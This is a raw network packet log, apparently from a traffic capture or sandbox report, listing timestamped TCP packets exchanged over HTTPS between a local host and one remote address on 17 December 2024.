                                                                        Dec 17, 2024 08:38:36.173410892 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.335063934 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.335097075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.335247040 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.335273027 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.335663080 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.339759111 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.339785099 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.339972019 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.340015888 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.343605042 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.343636036 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.343730927 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.343743086 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.343760014 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.343790054 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.348376989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.348407984 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.349102974 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.349112034 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.351686954 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.352184057 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.352206945 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.352289915 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.352289915 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.352299929 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.352425098 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.356722116 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.356750965 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.356836081 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.356842041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.359736919 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.360527992 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.360553026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.360625029 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.360630989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.364088058 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.365262985 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.365291119 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.365540028 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.365545988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.366913080 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.527255058 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.527301073 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.527348995 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.527360916 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.527478933 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.531148911 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.531168938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.531219006 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.531230927 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.531260014 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.535809994 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.535834074 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.535928965 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.535928965 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.535939932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.539642096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.539658070 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.539792061 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.539800882 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.544397116 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.544418097 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.544450998 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.544460058 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.544482946 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.547940016 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.547959089 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.548023939 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.548034906 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.552784920 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.552813053 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.552856922 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.552864075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.552891016 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.556574106 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.556598902 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.556677103 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.556678057 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.556688070 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.579108000 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.579266071 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.719491005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.719518900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.719755888 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.719767094 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.723304033 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.723341942 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.723349094 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.723354101 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.723418951 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.728055000 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.728079081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.728172064 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.728172064 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.728179932 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.728590965 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.731872082 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.731894970 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.731977940 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.731983900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.734474897 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.736665964 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.736692905 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.736737013 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.736743927 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.736790895 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.736790895 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.741080046 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.741096973 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.741179943 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.741187096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.741755009 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.744908094 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.744925976 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.745153904 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.745162010 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.745728970 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.748817921 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.748835087 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.748905897 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.748914003 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.751669884 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.911626101 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.911653042 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.911756992 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.911767960 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.911806107 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.915432930 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.915460110 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.915532112 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.915539026 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.915572882 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.915572882 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.920209885 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.920237064 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.920317888 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.920317888 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.920331001 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.920384884 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.924082994 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.924104929 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.924149036 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.924160957 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.924205065 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.924205065 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.929033995 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.929064035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.929162979 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.929162979 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.929184914 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.929227114 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.933190107 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.933218002 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.933262110 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.933275938 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.933315039 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.933315039 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.937060118 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.937083006 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.937163115 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.937163115 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.937175035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.937263966 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.940929890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.940958023 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.941169977 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:36.941198111 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:36.941637993 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.103908062 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.103938103 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.104002953 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.104017019 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.104063034 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.107678890 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.107706070 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.107815027 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.107815027 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.107835054 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.108010054 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.112521887 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.112548113 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.112617970 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.112632990 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.112771034 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.116144896 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.116163015 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.116220951 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.116230011 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.116266966 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.120984077 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.121002913 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.121074915 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.121088982 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.121313095 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.125463009 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.125479937 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.125612974 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.125626087 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.125988007 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.129229069 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.129250050 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.129476070 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.129491091 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.129535913 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.133980989 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.133999109 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.134140968 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.134155035 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.134232998 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.296076059 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.296107054 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.296262026 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.296262026 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.296286106 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.296596050 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.299838066 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.299890041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.299928904 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.299943924 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.300035954 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.300035954 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.304630041 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.304650068 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.304702044 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.304712057 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.304754972 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.308428049 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.308444977 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.308516026 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.308528900 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.308718920 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.313222885 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.313246965 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.313381910 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.313381910 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.313395977 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.313493013 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.317570925 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.317594051 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.317679882 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.317698956 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.317953110 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.321460009 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.321489096 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.321527958 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.321541071 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.321655989 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.321655989 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.326184988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.326201916 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.326296091 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.326311111 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.326451063 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.488743067 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.488764048 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.488884926 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.488904953 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.489099026 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.492515087 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.492537022 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.492713928 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.492713928 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.492734909 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.492780924 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.497256994 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.497272968 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.497390985 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.497410059 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.497524023 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.501235962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.501246929 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.501338005 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.501353979 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.501391888 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.501391888 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.504975080 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.504992962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.505260944 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.505273104 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.505357027 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.509438992 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.509454966 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.509706020 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.509718895 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.509804010 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.514152050 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.514168978 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.514283895 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.514297962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.514595985 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.518037081 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.518054962 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.518143892 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.518153906 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.518204927 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.518204927 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.680746078 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.680771112 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.680856943 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.680880070 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.680941105 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.680941105 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.684514046 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.684530020 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.684618950 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.684645891 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.684672117 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.684706926 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.689203024 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.689224005 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.689301014 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.689316988 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.689341068 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.689380884 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.693103075 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.693120003 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.693211079 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.693227053 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.693273067 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.697835922 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.697855949 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.697978973 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.697993994 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.698065042 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.702307940 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.702327967 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.702440023 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.702440023 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.702455044 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.702606916 CET49716443192.168.2.12188.114.96.6
                                                                        Dec 17, 2024 08:38:37.706177950 CET44349716188.114.96.6192.168.2.12
                                                                        Dec 17, 2024 08:38:37.706197977 CET44349716188.114.96.6192.168.2.12
